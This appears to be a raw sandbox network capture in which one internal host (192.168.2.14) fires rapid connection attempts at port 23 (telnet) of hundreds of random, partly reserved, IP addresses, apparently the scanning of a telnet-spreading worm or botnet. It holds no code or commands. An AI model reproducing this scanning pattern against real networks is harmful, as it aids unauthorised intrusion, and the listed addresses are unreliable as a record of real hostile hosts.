                                              Nov 23, 2023 05:14:48.994635105 CET4782823192.168.2.14218.91.22.69
                                              Nov 23, 2023 05:14:48.994764090 CET4782823192.168.2.14128.245.52.33
                                              Nov 23, 2023 05:14:48.994764090 CET4782823192.168.2.14145.19.95.242
                                              Nov 23, 2023 05:14:48.994764090 CET4782823192.168.2.14184.8.88.44
                                              Nov 23, 2023 05:14:48.994764090 CET4782823192.168.2.14147.133.133.138
                                              Nov 23, 2023 05:14:48.994765043 CET4782823192.168.2.14191.177.189.96
                                              Nov 23, 2023 05:14:48.994765043 CET4782823192.168.2.14245.108.163.167
                                              Nov 23, 2023 05:14:48.994765043 CET4782823192.168.2.1488.196.154.175
                                              Nov 23, 2023 05:14:48.994765043 CET4782823192.168.2.14204.230.82.90
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.1448.164.223.212
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.14104.68.199.212
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.14211.94.39.158
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.14190.238.248.34
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.1472.105.202.8
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.14177.130.93.182
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.14187.172.125.76
                                              Nov 23, 2023 05:14:48.994767904 CET4782823192.168.2.1478.24.223.41
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.14101.79.211.253
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.14162.52.2.94
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.1468.155.100.120
                                              Nov 23, 2023 05:14:48.994771957 CET4782823192.168.2.14222.248.0.245
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.1482.98.96.90
                                              Nov 23, 2023 05:14:48.994771957 CET4782823192.168.2.14200.32.235.129
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14252.245.203.221
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.1457.254.131.129
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14213.143.169.10
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.14101.248.246.75
                                              Nov 23, 2023 05:14:48.994771957 CET4782823192.168.2.1469.159.157.32
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.1487.13.42.150
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.1418.50.1.205
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.1474.111.140.164
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14176.68.92.81
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.14188.125.229.37
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.1468.90.83.141
                                              Nov 23, 2023 05:14:48.994771957 CET4782823192.168.2.14171.232.192.240
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.14218.138.136.87
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.1483.228.204.233
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14153.97.214.20
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14176.70.150.23
                                              Nov 23, 2023 05:14:48.994769096 CET4782823192.168.2.14126.234.202.51
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14221.61.226.191
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.1454.14.53.75
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.1493.221.61.48
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.14190.13.7.236
                                              Nov 23, 2023 05:14:48.994770050 CET4782823192.168.2.14173.245.42.0
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.1499.100.120.158
                                              Nov 23, 2023 05:14:48.994792938 CET4782823192.168.2.1432.36.141.62
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.1432.96.118.79
                                              Nov 23, 2023 05:14:48.994792938 CET4782823192.168.2.1468.50.187.241
                                              Nov 23, 2023 05:14:48.994772911 CET4782823192.168.2.1494.115.161.190
                                              Nov 23, 2023 05:14:48.994796991 CET4782823192.168.2.14136.64.81.212
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.14251.139.65.193
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.14247.77.22.205
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.1459.235.50.100
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.14183.48.108.211
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14163.61.233.144
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.14211.125.40.32
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14111.198.35.253
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.1484.224.66.235
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.1475.185.238.130
                                              Nov 23, 2023 05:14:48.994823933 CET4782823192.168.2.14109.243.179.158
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14165.11.68.118
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14212.8.39.158
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.1445.157.21.107
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14209.78.43.178
                                              Nov 23, 2023 05:14:48.994824886 CET4782823192.168.2.14125.230.193.50
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.144.1.49.240
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.14113.81.210.1
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.1485.166.159.71
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.14212.118.216.15
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.1476.117.178.229
                                              Nov 23, 2023 05:14:48.994849920 CET4782823192.168.2.14176.177.38.150
                                              Nov 23, 2023 05:14:48.994873047 CET4782823192.168.2.14165.233.55.136
                                              Nov 23, 2023 05:14:48.994873047 CET4782823192.168.2.14248.195.123.167
                                              Nov 23, 2023 05:14:48.994873047 CET4782823192.168.2.1445.182.143.255
                                              Nov 23, 2023 05:14:48.994873047 CET4782823192.168.2.14157.155.237.187
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.1440.248.87.119
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.14111.192.170.92
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.1463.239.167.228
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.1494.235.247.96
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.14213.119.48.175
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.14244.238.74.140
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.1473.198.97.28
                                              Nov 23, 2023 05:14:48.994925022 CET4782823192.168.2.1438.132.38.238
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14103.243.234.250
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14182.97.106.17
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.1427.176.252.84
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.1498.139.178.133
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.1462.120.50.89
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.14142.230.107.118
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1497.255.188.194
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14105.39.10.10
                                              Nov 23, 2023 05:14:48.994932890 CET4782823192.168.2.14192.7.94.110
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1448.39.57.253
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.14118.170.216.36
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.14246.214.219.34
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14119.159.46.42
                                              Nov 23, 2023 05:14:48.994932890 CET4782823192.168.2.14243.162.102.74
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.1423.93.181.192
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.149.76.23.144
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1467.41.196.3
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.14125.167.217.7
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1463.190.189.163
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14119.10.148.187
                                              Nov 23, 2023 05:14:48.994930983 CET4782823192.168.2.14213.172.3.176
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.14111.81.156.96
                                              Nov 23, 2023 05:14:48.994932890 CET4782823192.168.2.14221.23.2.215
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.14219.59.239.162
                                              Nov 23, 2023 05:14:48.994930983 CET4782823192.168.2.1468.125.170.40
                                              Nov 23, 2023 05:14:48.994932890 CET4782823192.168.2.14122.34.175.58
                                              Nov 23, 2023 05:14:48.994930983 CET4782823192.168.2.14201.135.22.71
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.1494.229.219.129
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14172.243.250.19
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.1423.54.100.0
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14204.109.195.249
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1457.157.192.44
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.14151.167.220.18
                                              Nov 23, 2023 05:14:48.994954109 CET4782823192.168.2.14122.187.99.217
                                              Nov 23, 2023 05:14:48.994930029 CET4782823192.168.2.1447.168.102.181
                                              Nov 23, 2023 05:14:48.994954109 CET4782823192.168.2.14183.13.103.217
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.1498.99.156.212
                                              Nov 23, 2023 05:14:48.994954109 CET4782823192.168.2.14177.197.113.125
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.142.232.62.234
                                              Nov 23, 2023 05:14:48.994955063 CET4782823192.168.2.1434.137.161.122
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.14255.60.69.212
                                              Nov 23, 2023 05:14:48.994955063 CET4782823192.168.2.14191.31.74.179
                                              Nov 23, 2023 05:14:48.994929075 CET4782823192.168.2.1419.226.213.143
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14101.140.229.93
                                              Nov 23, 2023 05:14:48.994932890 CET4782823192.168.2.14104.228.45.89
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14110.157.137.112
                                              Nov 23, 2023 05:14:48.994927883 CET4782823192.168.2.14130.15.37.130
                                              Nov 23, 2023 05:14:48.994955063 CET4782823192.168.2.148.93.254.39
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14133.137.245.209
                                              Nov 23, 2023 05:14:48.994935036 CET4782823192.168.2.14255.102.150.135
                                              Nov 23, 2023 05:14:48.994998932 CET4782823192.168.2.14123.122.107.71
                                              Nov 23, 2023 05:14:48.994998932 CET4782823192.168.2.1482.130.11.135
                                              Nov 23, 2023 05:14:48.994998932 CET4782823192.168.2.14240.82.127.50
                                              Nov 23, 2023 05:14:48.994998932 CET4782823192.168.2.14159.160.48.46
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.1459.10.97.141
                                              Nov 23, 2023 05:14:48.994998932 CET4782823192.168.2.1444.90.232.31
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.14186.237.107.181
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.14250.199.14.44
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.149.170.141.158
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.14252.196.123.40
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.1476.150.44.101
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.14170.107.47.108
                                              Nov 23, 2023 05:14:48.995001078 CET4782823192.168.2.14255.154.60.143
                                              Nov 23, 2023 05:14:48.995021105 CET4782823192.168.2.14197.191.46.243
                                              Nov 23, 2023 05:14:48.995021105 CET4782823192.168.2.14107.81.141.212
                                              Nov 23, 2023 05:14:48.995021105 CET4782823192.168.2.1444.47.166.178
                                              Nov 23, 2023 05:14:48.995021105 CET4782823192.168.2.1464.253.172.143
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.1483.224.45.131
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.14159.88.213.210
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.1471.212.93.37
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.14250.153.193.231
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.14219.142.200.218
                                              Nov 23, 2023 05:14:48.995028019 CET4782823192.168.2.1468.137.26.224
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.14110.201.76.241
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.14133.212.46.164
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.14124.15.141.244
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.14188.234.147.41
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.1447.129.204.226
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.1490.38.79.145
                                              Nov 23, 2023 05:14:48.995034933 CET4782823192.168.2.1437.106.159.18
                                              Nov 23, 2023 05:14:48.995035887 CET4782823192.168.2.14190.87.26.226
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.1483.243.117.15
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.1484.20.115.206
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.14249.244.53.219
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.1432.184.79.65
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.1483.47.111.106
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.1461.105.70.0
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.14249.142.128.19
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.1438.183.33.76
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.1423.49.98.220
                                              Nov 23, 2023 05:14:48.995058060 CET4782823192.168.2.14179.54.243.92
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.1488.54.245.159
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.1488.198.142.255
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.14205.235.102.11
                                              Nov 23, 2023 05:14:48.995059013 CET4782823192.168.2.14117.231.231.177
                                              Nov 23, 2023 05:14:48.995075941 CET4782823192.168.2.1491.245.85.88
                                              Nov 23, 2023 05:14:48.995075941 CET4782823192.168.2.1489.122.232.130
                                              Nov 23, 2023 05:14:48.995075941 CET4782823192.168.2.14198.93.11.105
                                              Nov 23, 2023 05:14:48.995075941 CET4782823192.168.2.14193.250.19.248
                                              Nov 23, 2023 05:14:48.995075941 CET4782823192.168.2.1417.26.126.194
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.14186.86.71.121
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.14210.197.175.249
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.1458.240.20.159
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.1419.46.126.199
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.1413.160.46.200
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.14188.182.67.161
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.1427.35.81.195
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.1483.125.174.249
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.14180.205.202.86
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.1448.113.157.85
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.1417.233.215.150
                                              Nov 23, 2023 05:14:48.995110989 CET4782823192.168.2.14188.43.223.133
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.14178.47.34.97
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.14109.111.184.118
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.14172.139.176.128
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.145.166.87.111
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.148.42.134.27
                                              Nov 23, 2023 05:14:48.995126009 CET4782823192.168.2.1469.30.126.28
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.1483.220.185.118
                                              Nov 23, 2023 05:14:48.995126009 CET4782823192.168.2.14222.223.29.1
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.14191.123.113.56
                                              Nov 23, 2023 05:14:48.995126963 CET4782823192.168.2.14121.154.224.14
                                              Nov 23, 2023 05:14:48.995115042 CET4782823192.168.2.14205.239.89.19
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.14150.105.156.26
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.14157.231.35.71
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.14212.88.23.197
                                              Nov 23, 2023 05:14:48.995119095 CET4782823192.168.2.14220.99.40.50
                                              Nov 23, 2023 05:14:48.995145082 CET4782823192.168.2.14219.202.129.215
                                              Nov 23, 2023 05:14:48.995145082 CET4782823192.168.2.14242.142.215.87
                                              Nov 23, 2023 05:14:48.995145082 CET4782823192.168.2.1466.116.178.155
                                              Nov 23, 2023 05:14:48.995145082 CET4782823192.168.2.14254.157.177.231
                                              Nov 23, 2023 05:14:48.995145082 CET4782823192.168.2.14107.30.3.211
                                              Nov 23, 2023 05:14:48.995146036 CET4782823192.168.2.14112.112.110.203
                                              Nov 23, 2023 05:14:48.995146036 CET4782823192.168.2.14183.47.249.28
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1457.255.90.51
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1465.35.14.170
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.14242.121.6.125
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1417.220.44.132
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1498.249.186.99
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.14142.98.137.137
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1466.238.168.154
                                              Nov 23, 2023 05:14:48.995156050 CET4782823192.168.2.1431.42.184.210
                                              Nov 23, 2023 05:14:48.995194912 CET4782823192.168.2.14103.188.144.41
                                              Nov 23, 2023 05:14:48.995194912 CET4782823192.168.2.14250.39.93.84
                                              Nov 23, 2023 05:14:48.995204926 CET4782823192.168.2.14120.188.210.33
                                              Nov 23, 2023 05:14:48.995204926 CET4782823192.168.2.1468.201.75.13
                                              Nov 23, 2023 05:14:48.995204926 CET4782823192.168.2.1416.158.106.76
                                              Nov 23, 2023 05:14:48.995204926 CET4782823192.168.2.14185.18.138.83
                                              Nov 23, 2023 05:14:48.995204926 CET4782823192.168.2.14210.2.64.197
                                              Nov 23, 2023 05:14:48.995212078 CET4782823192.168.2.14145.124.238.141
                                              Nov 23, 2023 05:14:48.995212078 CET4782823192.168.2.14218.197.159.151
                                              Nov 23, 2023 05:14:48.995212078 CET4782823192.168.2.1471.252.105.98
                                              Nov 23, 2023 05:14:48.995212078 CET4782823192.168.2.14101.216.89.0
                                              Nov 23, 2023 05:14:48.995212078 CET4782823192.168.2.1461.48.39.173
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.1431.119.106.131
                                              Nov 23, 2023 05:14:48.995228052 CET4782823192.168.2.1448.156.137.174
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.14249.58.84.221
                                              Nov 23, 2023 05:14:48.995228052 CET4782823192.168.2.144.151.127.74
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.1440.135.135.87
                                              Nov 23, 2023 05:14:48.995228052 CET4782823192.168.2.1438.249.177.194
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.1498.126.65.184
                                              Nov 23, 2023 05:14:48.995228052 CET4782823192.168.2.14136.4.181.182
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.14202.184.199.120
                                              Nov 23, 2023 05:14:48.995229006 CET4782823192.168.2.148.66.162.224
                                              Nov 23, 2023 05:14:48.995227098 CET4782823192.168.2.14102.159.26.162
                                              Nov 23, 2023 05:14:48.995229006 CET4782823192.168.2.1479.48.54.65
                                              Nov 23, 2023 05:14:48.995229006 CET4782823192.168.2.14243.82.65.9
                                              Nov 23, 2023 05:14:48.995229006 CET4782823192.168.2.14159.164.0.122
                                              Nov 23, 2023 05:14:48.995240927 CET4782823192.168.2.142.208.110.38
                                              Nov 23, 2023 05:14:48.995246887 CET4782823192.168.2.14154.190.3.83
                                              Nov 23, 2023 05:14:48.995246887 CET4782823192.168.2.1460.181.76.55
                                              Nov 23, 2023 05:14:48.995246887 CET4782823192.168.2.14154.25.235.77
                                              Nov 23, 2023 05:14:48.995246887 CET4782823192.168.2.14105.170.148.237
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.14135.245.145.150
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.1494.137.9.170
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.1453.221.60.125
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.1446.186.182.134
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.14164.165.196.3
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.1418.167.82.134
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.14217.99.9.37
                                              Nov 23, 2023 05:14:48.995259047 CET4782823192.168.2.14223.185.202.65
                                              Nov 23, 2023 05:14:48.995275021 CET4782823192.168.2.14161.164.158.192
                                              Nov 23, 2023 05:14:48.995292902 CET4782823192.168.2.14206.162.27.82
                                              Nov 23, 2023 05:14:48.995292902 CET4782823192.168.2.14121.162.239.219
                                              Nov 23, 2023 05:14:48.995292902 CET4782823192.168.2.14130.26.41.150
                                              Nov 23, 2023 05:14:48.995295048 CET4782823192.168.2.1445.169.206.76
                                              Nov 23, 2023 05:14:48.995295048 CET4782823192.168.2.14170.140.61.80
                                              Nov 23, 2023 05:14:48.995295048 CET4782823192.168.2.1488.98.70.2
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.1413.140.109.67
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14146.140.149.183
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14252.21.71.235
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14141.216.114.29
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.1484.104.164.178
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14218.132.127.81
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14157.190.44.178
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14158.223.140.26
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14181.19.200.151
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14151.89.90.163
                                              Nov 23, 2023 05:14:48.995304108 CET4782823192.168.2.14155.66.157.80
                                              Nov 23, 2023 05:14:48.995306969 CET4782823192.168.2.14160.161.143.43
                                              Nov 23, 2023 05:14:48.995317936 CET4782823192.168.2.1466.186.60.24
                                              Nov 23, 2023 05:14:48.995333910 CET4782823192.168.2.14105.12.160.39
                                              Nov 23, 2023 05:14:48.995341063 CET4782823192.168.2.14150.51.165.114
                                              Nov 23, 2023 05:14:48.995341063 CET4782823192.168.2.14121.78.150.239
                                              Nov 23, 2023 05:14:48.995341063 CET4782823192.168.2.14183.249.183.64
                                              Nov 23, 2023 05:14:48.995346069 CET4782823192.168.2.1485.89.246.147
                                              Nov 23, 2023 05:14:48.995346069 CET4782823192.168.2.14164.62.190.146
                                              Nov 23, 2023 05:14:48.995347023 CET4782823192.168.2.1448.76.79.202
                                              Nov 23, 2023 05:14:48.995347023 CET4782823192.168.2.14154.86.96.99
                                              Nov 23, 2023 05:14:48.995347023 CET4782823192.168.2.14210.141.244.58
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.14164.79.241.148
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.14153.146.74.118
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.14112.38.220.22
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.14146.125.93.11
                                              Nov 23, 2023 05:14:48.995362997 CET4782823192.168.2.1490.198.113.39
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.14102.85.206.71
                                              Nov 23, 2023 05:14:48.995362997 CET4782823192.168.2.14103.90.6.192
                                              Nov 23, 2023 05:14:48.995362043 CET4782823192.168.2.1413.61.25.113
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.1462.183.55.86
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.1436.18.154.8
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.14162.183.188.18
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.14197.251.79.241
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.14181.114.151.76
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.14217.28.111.158
                                              Nov 23, 2023 05:14:48.995368004 CET4782823192.168.2.1467.74.116.86
                                              Nov 23, 2023 05:14:48.995373011 CET4782823192.168.2.1488.237.243.24
                                              Nov 23, 2023 05:14:48.995374918 CET4782823192.168.2.14156.18.2.59
                                              Nov 23, 2023 05:14:48.995374918 CET4782823192.168.2.14216.238.226.74
                                              Nov 23, 2023 05:14:48.995383024 CET4782823192.168.2.1440.0.87.113
                                              Nov 23, 2023 05:14:48.995390892 CET4782823192.168.2.1486.139.177.2
                                              Nov 23, 2023 05:14:48.995404959 CET4782823192.168.2.1497.43.223.99
                                              Nov 23, 2023 05:14:48.995409012 CET4782823192.168.2.14150.73.142.69
                                              Nov 23, 2023 05:14:48.995409012 CET4782823192.168.2.14116.209.165.112
                                              Nov 23, 2023 05:14:48.995420933 CET4782823192.168.2.1461.188.86.195
                                              Nov 23, 2023 05:14:48.995420933 CET4782823192.168.2.14187.196.38.92
                                              Nov 23, 2023 05:14:48.995420933 CET4782823192.168.2.1427.80.79.72
                                              Nov 23, 2023 05:14:48.995423079 CET4782823192.168.2.1481.105.82.176
                                              Nov 23, 2023 05:14:48.995433092 CET4782823192.168.2.1448.0.216.211
                                              Nov 23, 2023 05:14:48.995439053 CET4782823192.168.2.14169.4.250.47
                                              Nov 23, 2023 05:14:48.995449066 CET4782823192.168.2.14177.15.144.11
                                              Nov 23, 2023 05:14:48.995450020 CET4782823192.168.2.14123.7.244.63
                                              Nov 23, 2023 05:14:48.995451927 CET4782823192.168.2.14122.192.189.99
                                              Nov 23, 2023 05:14:48.995454073 CET4782823192.168.2.14105.202.223.135
                                              Nov 23, 2023 05:14:48.995462894 CET4782823192.168.2.14146.133.137.61
                                              Nov 23, 2023 05:14:48.995481014 CET4782823192.168.2.14188.40.13.243
                                              Nov 23, 2023 05:14:48.995481014 CET4782823192.168.2.14222.153.192.12
                                              Nov 23, 2023 05:14:48.995481014 CET4782823192.168.2.14152.2.198.216
                                              Nov 23, 2023 05:14:48.995486021 CET4782823192.168.2.1468.178.209.176
                                              Nov 23, 2023 05:14:48.995491028 CET4782823192.168.2.1485.104.22.240
                                              Nov 23, 2023 05:14:48.995503902 CET4782823192.168.2.14125.30.181.198
                                              Nov 23, 2023 05:14:48.995503902 CET4782823192.168.2.1473.34.83.196
                                              Nov 23, 2023 05:14:48.995508909 CET4782823192.168.2.14120.210.62.187
                                              Nov 23, 2023 05:14:48.995510101 CET4782823192.168.2.1457.142.64.142
                                              Nov 23, 2023 05:14:48.995529890 CET4782823192.168.2.14160.109.248.16
                                              Nov 23, 2023 05:14:48.995534897 CET4782823192.168.2.14114.181.40.81
                                              Nov 23, 2023 05:14:48.995549917 CET4782823192.168.2.14115.249.233.22
                                              Nov 23, 2023 05:14:48.995549917 CET4782823192.168.2.1443.254.59.242
                                              Nov 23, 2023 05:14:48.995552063 CET4782823192.168.2.1491.33.53.91
                                              Nov 23, 2023 05:14:48.995557070 CET4782823192.168.2.14173.125.242.162
                                              Nov 23, 2023 05:14:48.995558023 CET4782823192.168.2.1482.217.90.122
                                              Nov 23, 2023 05:14:48.995562077 CET4782823192.168.2.1436.88.122.239
                                              Nov 23, 2023 05:14:48.995568991 CET4782823192.168.2.14223.24.21.115
                                              Nov 23, 2023 05:14:48.995568991 CET4782823192.168.2.14244.218.21.176
                                              Nov 23, 2023 05:14:48.995569944 CET4782823192.168.2.14183.45.184.249
                                              Nov 23, 2023 05:14:48.995568991 CET4782823192.168.2.14208.205.53.250
